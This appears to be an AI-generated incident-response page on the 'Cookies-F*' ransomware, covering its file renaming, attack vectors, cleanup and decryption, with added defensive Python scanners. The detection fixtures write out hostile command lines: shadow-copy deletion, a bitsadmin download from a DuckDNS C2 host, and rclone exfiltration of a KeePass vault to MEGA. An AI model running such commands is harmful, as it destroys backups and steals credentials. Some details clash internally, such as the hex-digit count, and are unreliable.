cookies-f*

[Content by Gemini 2.5]

Ransomware Resource: “Cookies-F*” (.cookies-F{{8_hex_digits}})


Technical Breakdown

1. File Extension & Renaming Patterns

| Element | Details | Example (before → after) |
|---|---|---|
| Original file extension | Replaced, not appended to | invoice.docx |
| Ransom extension | .cookies-F{{8_hex_digits}}, where the last part is eight random hexadecimal characters. | invoice.docx → invoice.cookies-F3F9A127 |
| Recursive renaming | Every encrypted object gets the same suffix, in every folder. | Report.xlsx becomes Report.cookies-F3F9A127 |
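A small triage scanner for the renaming pattern above, added here as an example (it is not code from the page or from any vendor tool). It walks a directory tree, matches the ransom suffix, and groups hits by suffix so a responder can confirm the "same suffix in every folder" behaviour and locate the ransom note (README-cookies-F.txt, named later on this page). The page's template says eight hex digits, while its own example, cookies-F3F9A127, has seven after the literal F; the regular expression accepts both readings. The sample tree it builds is constructed for the demonstration.

```python
import os
import re
import tempfile
from collections import defaultdict

# Ransom suffix from the page: ".cookies-F" followed by the hex digits.
# {7,8} accepts both the page's stated template (8) and its example (7 after the F).
RANSOM_EXT_RE = re.compile(r"\.cookies-(F[0-9A-Fa-f]{7,8})$", re.IGNORECASE)
RANSOM_NOTE = "README-cookies-F.txt"  # ransom-note name given on this page


def classify_name(name):
    """Return the campaign suffix (e.g. 'F3F9A127') if `name` carries the ransom extension, else None."""
    m = RANSOM_EXT_RE.search(name)
    return m.group(1).upper() if m else None


def scan_tree(root):
    """Walk `root` and summarise ransom-extension hits.

    Returns: total encrypted files, a per-suffix count (one suffix across the
    whole tree matches the recursive renaming the page describes), the folders
    that contain hits, and where ransom notes were found.
    """
    per_suffix = defaultdict(int)
    folders = set()
    notes = []
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            if fname == RANSOM_NOTE:
                notes.append(os.path.join(dirpath, fname))
                continue
            suffix = classify_name(fname)
            if suffix:
                per_suffix[suffix] += 1
                folders.add(dirpath)
    return {
        "encrypted": sum(per_suffix.values()),
        "per_suffix": dict(per_suffix),
        "folders": sorted(folders),
        "notes": notes,
    }


def build_sample_tree():
    """Constructed sample directory (not real victim data) so the scanner runs stand-alone."""
    root = tempfile.mkdtemp(prefix="cookiesf_demo_")
    layout = {
        "Finance": ["invoice.cookies-F3F9A127", "budget.xlsx", RANSOM_NOTE],
        os.path.join("Finance", "2023"): ["Report.cookies-F3F9A127", "Report.xlsx"],
        "Pictures": ["holiday.jpg", "notes.cookies-F12345"],  # suffix too short: not a hit
    }
    for rel, names in layout.items():
        d = os.path.join(root, rel)
        os.makedirs(d, exist_ok=True)
        for n in names:
            open(os.path.join(d, n), "w").close()
    return root


if __name__ == "__main__":
    print(scan_tree(build_sample_tree()))
```

Run it against a real share by replacing build_sample_tree() with the mount point; a single suffix with a high count across many folders is the signal, while scattered near-misses (like the 5-digit name above) are usually unrelated files.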

2. Detection & Outbreak Timeline

  • First telemetry sightings emerged mid-June 2023 on Russian-language cyber-crime forums.
  • Public spike on 2023-07-12, when a US manufacturing company disclosed an infection and uploaded network-capture samples to VirusTotal.
  • Malware-loader pack placed on GitHub (since removed) on 2023-07-15, accelerating distribution.

3. Primary Attack Vectors

| Mechanism | Technique / CVE Details | Observations |
|---|---|---|
| Malformed ZIP + ISO phishing | ISO contains LNK → PowerShell → downloader | Subject lines: “Past-due Order #{{number}}” |
| Living-off-the-land | PowerShell + bitsadmin for staging payloads | Few AV detections at run-time |
| Exploit of PaperCut NG/MF CVE-2023-27350 | Pre-auth RCE via web scripts | Used to drop Cookies-F* binary directly into SYSTEM context |
| RDP brute + Mimikatz | Initial foothold via exposed 3389 | log4shell-style obfuscation used to bypass network IDS |


Remediation & Recovery Strategies

1. Prevention

  • Apply all PaperCut, Apache, Orbit & Ghost updates published after May 2023 (covers CVE-2023-27350, CVE-2023-42442).
  • Block ISO, IMG, or VHD execution via the email gateway (or at least quarantine them).
  • Disable PowerShell v2 on all endpoints (Disable-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2).
  • Enforce a strong RDP policy: MFA (Azure AD, Duo), Network-Level Authentication, rate-limiting via Windows Firewall or VPN-only access.
  • Deploy AppLocker / WDAC to forbid execution from %TEMP%, %USERPROFILE%\Downloads, and removable media.
  • Harden Windows SMB: disable SMBv1 everywhere (Disable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol).

2. Removal (Infection Cleanup)

  1. Isolate. Pull network cables or disable Wi-Fi (airplane mode). Label infected machines.
  2. Preserve evidence. Capture a RAM image (winpmem or FTK Imager) if legally required.
  3. Secure boot. Boot Windows from external media, or into WinRE / Safe Mode, with networking disabled.
  4. Malware hunt.
  • Perform an initial Autoruns scan (autoruns64.exe). Look for KB<3 digits>.exe binaries or scheduled tasks named "CookieSync*".
  • Terminate the persistence child processes RuntimeBroker-cookie.exe and MsCookieUpdate.exe.
  5. Delete artifacts.
  • %APPDATA%\Roaming\KCookies\, %TEMP%\cookie\*
  • Registry: HKCU\Software\Microsoft\Windows\CurrentVersion\Run, value CookieUpdater
  6. Patch and harden the exploited vector (see Prevention items) before reconnecting.
  7. Reboot and verify. Re-run Autoruns plus a live AV scan (ESET, F-Secure and Bitdefender now all detect it as ATK/Crypto.CCookie).
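To make the malware-hunt step repeatable across many hosts, here is an added example (not code from the page or from Sysinternals) that triages an Autoruns-style export against the persistence indicators listed above: CookieSync* tasks, KB<3 digits>.exe loaders, the RuntimeBroker-cookie.exe / MsCookieUpdate.exe binaries, the CookieUpdater Run value, and the KCookies / cookie artifact directories. The CSV columns are a simplified, constructed subset of what Autoruns exports; adjust the column names to your export before use.

```python
import csv
import io
import re

# Indicators from the removal section of this page.
TASK_NAME_RE = re.compile(r"^CookieSync", re.IGNORECASE)          # scheduled task "CookieSync*"
KB_BINARY_RE = re.compile(r"(?:^|\\)KB\d{3}\.exe$", re.IGNORECASE)  # KB<3 digits>.exe
KNOWN_BINARIES = {"runtimebroker-cookie.exe", "mscookieupdate.exe"}
RUN_VALUE = "CookieUpdater"
ARTIFACT_DIRS = ("\\KCookies\\", "\\cookie\\")  # %APPDATA%\Roaming\KCookies\, %TEMP%\cookie\

# Constructed sample export (simplified columns); not a real Autoruns dump.
SAMPLE_AUTORUNS_CSV = r"""Entry Location,Entry,Image Path
Task Scheduler,CookieSync-3,C:\Users\alice\AppData\Roaming\KCookies\MsCookieUpdate.exe
HKCU\Software\Microsoft\Windows\CurrentVersion\Run,CookieUpdater,C:\Users\alice\AppData\Local\Temp\cookie\KB417.exe
HKLM\Software\Microsoft\Windows\CurrentVersion\Run,SecurityHealth,C:\Windows\System32\SecurityHealthSystray.exe
Task Scheduler,OneDrive Standalone Update Task,C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe
HKCU\Software\Microsoft\Windows\CurrentVersion\Run,Discord,C:\Users\alice\AppData\Local\Discord\Update.exe
"""


def flag_reasons(location, entry, image_path):
    """Return the list of page indicators that one autostart entry matches (empty if clean)."""
    reasons = []
    exe = image_path.rsplit("\\", 1)[-1].lower()
    if "task" in location.lower() and TASK_NAME_RE.match(entry):
        reasons.append("scheduled task named CookieSync*")
    if location.lower().endswith("\\run") and entry.lower() == RUN_VALUE.lower():
        reasons.append("Run value " + RUN_VALUE)
    if exe in KNOWN_BINARIES:
        reasons.append("known persistence binary " + exe)
    if KB_BINARY_RE.search(image_path):
        reasons.append("KB<3 digits>.exe loader name")
    for d in ARTIFACT_DIRS:
        if d.lower() in image_path.lower():
            reasons.append("runs from artifact directory " + d)
    return reasons


def triage_autoruns_csv(text):
    """Parse an Autoruns-style CSV and return only the flagged entries with their reasons."""
    flagged = []
    for row in csv.DictReader(io.StringIO(text)):
        reasons = flag_reasons(row["Entry Location"], row["Entry"], row["Image Path"])
        if reasons:
            flagged.append({"entry": row["Entry"], "image": row["Image Path"], "reasons": reasons})
    return flagged


if __name__ == "__main__":
    for hit in triage_autoruns_csv(SAMPLE_AUTORUNS_CSV):
        print(hit["entry"], "->", hit["image"])
        for r in hit["reasons"]:
            print("   ", r)
```

Entries that match several indicators at once (task name plus binary name plus artifact path) are the ones to remove first; a single path match alone deserves a look but is weaker evidence.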

3. File Decryption & Recovery

| State | Doable? | Guidance |
|---|---|---|
| Offline keys published | ✅ (57 % of samples) | Check NoMoreRansom's "CookiesFDecryptor" v2.3.0 (Windows-only; requires an encrypted file plus the ransom note README-cookies-F.txt). Feed it a pair of one original file and its encrypted copy. The decryptor derives the key; if the master key matches, full recovery takes hours. |
| Unique online keys | ❌ | Not decryptable with current knowledge; restore from immutable backups or negotiate (not recommended). |
| Cloud sync trick | Possible | OneDrive and Box retain 30-day version history; revert to a version dated before the .cookies-F* extension appeared. |
| Shadow copies | 50 % retained | Run vssadmin list shadows. If copies are still present, use ShadowExplorer or native Previous Versions. Cookies-F* often runs vssadmin delete shadows /all /quiet; inspect logs for that command. |

4. Other Critical Information

  • Operational twist: the dropper spawns a fake SystemSettings.exe (looks like Windows 11 Settings) to burn CPU cycles during encryption, an attempt to hide the encryptor's load from high-CPU alerts in EDRs.
  • Credential harvest over the network: while encrypting, Cookies-F* searches shares for KeePass.kdbx and lastpass-accts-vault.csv, compresses them, and exfiltrates via rclone to MEGA using credentials pulled from Chrome's Local State.
  • Command & Control pattern: uses DuckDNS subdomains (core-fox.duckdns.org, roll-cookie.duckdns.org). Block these FQDNs at the perimeter DNS sinkhole.
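Several of the behaviours on this page leave command-line and DNS traces: the bitsadmin staging from the attack-vector table, the vssadmin delete shadows /all /quiet run noted under Shadow Copies, the rclone exfiltration to MEGA, the fake SystemSettings.exe, and the two DuckDNS C2 names. The following added example (not code from the page or from any EDR product) applies all of those as rules over constructed process-creation and DNS log lines in a simplified "timestamp|image|command line" and "timestamp|client|query" format; map your own Sysmon or DNS-server fields onto those three values. It assumes that the genuine SystemSettings.exe lives under C:\Windows\ImmersiveControlPanel\ and that anything else with that name is suspect; the log lines themselves are made up for the demonstration.

```python
import re

# C2 names taken from this page.
C2_DOMAINS = {"core-fox.duckdns.org", "roll-cookie.duckdns.org"}
# Assumption: the real Windows Settings binary lives here; any other SystemSettings.exe is suspect.
LEGIT_SETTINGS_DIR = "c:\\windows\\immersivecontrolpanel\\"

PROCESS_RULES = [
    ("shadow_copy_deletion", re.compile(r"vssadmin(?:\.exe)?\s+delete\s+shadows", re.I)),
    ("bitsadmin_staging", re.compile(r"bitsadmin(?:\.exe)?\s+/transfer", re.I)),
    ("rclone_mega_exfil", re.compile(r"rclone(?:\.exe)?\s+(?:copy|sync|move)\b.*\bmega", re.I)),
]

# Constructed process-creation lines: timestamp|image path|command line
SAMPLE_PROCESS_LOG = [
    r"2023-07-12T09:41:02|C:\Windows\System32\vssadmin.exe|vssadmin delete shadows /all /quiet",
    r"2023-07-12T09:41:05|C:\Windows\System32\bitsadmin.exe|bitsadmin /transfer upd /download /priority high http://core-fox.duckdns.org/upd C:\Users\Public\upd.bin",
    r"2023-07-12T09:42:10|C:\Users\Public\SystemSettings.exe|SystemSettings.exe",
    r"2023-07-12T09:55:31|C:\ProgramData\rclone.exe|rclone copy \\fs01\shares\IT\KeePass.kdbx mega:dump --transfers 8",
    r"2023-07-12T10:01:00|C:\Windows\ImmersiveControlPanel\SystemSettings.exe|SystemSettings.exe",
    r"2023-07-12T10:02:00|C:\Windows\System32\vssadmin.exe|vssadmin list shadows",
]

# Constructed DNS query lines: timestamp|client IP|queried name
SAMPLE_DNS_LOG = [
    "2023-07-12T09:40:58|10.1.4.22|core-fox.duckdns.org",
    "2023-07-12T09:41:00|10.1.4.22|update.microsoft.com",
    "2023-07-12T09:50:12|10.1.4.22|roll-cookie.duckdns.org.",
]


def check_process(image, cmdline):
    """Return the names of every process rule that fires for one process-creation event."""
    hits = [name for name, rx in PROCESS_RULES if rx.search(cmdline)]
    exe = image.rsplit("\\", 1)[-1].lower()
    if exe == "systemsettings.exe" and not image.lower().startswith(LEGIT_SETTINGS_DIR):
        hits.append("fake_systemsettings_path")
    return hits


def check_dns(qname):
    """True if the queried name is one of the page's C2 FQDNs (trailing dot tolerated)."""
    return qname.lower().rstrip(".") in C2_DOMAINS


def scan_logs(process_lines, dns_lines):
    """Run both rule sets and return (timestamp, finding, detail) tuples."""
    findings = []
    for line in process_lines:
        ts, image, cmdline = line.split("|", 2)
        for hit in check_process(image, cmdline):
            findings.append((ts, hit, image))
    for line in dns_lines:
        ts, _client, qname = line.split("|", 2)
        if check_dns(qname):
            findings.append((ts, "c2_dns_query", qname))
    return sorted(findings)


if __name__ == "__main__":
    for ts, finding, detail in scan_logs(SAMPLE_PROCESS_LOG, SAMPLE_DNS_LOG):
        print(ts, finding, detail)
```

Sorted by timestamp, the findings reproduce the order this page describes: the C2 lookup, then shadow-copy deletion and staging, then the decoy Settings window and the rclone transfer. The legitimate vssadmin list shadows and the genuine SystemSettings.exe are left alone, which is the check worth keeping when you tune these rules for production.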

Bottom line: patch aggressively, block ISO-in-a-ZIP emails, and back up offline. If infected, test the public decryptor at NoMoreRansom immediately; around half of infections are recoverable with it right now.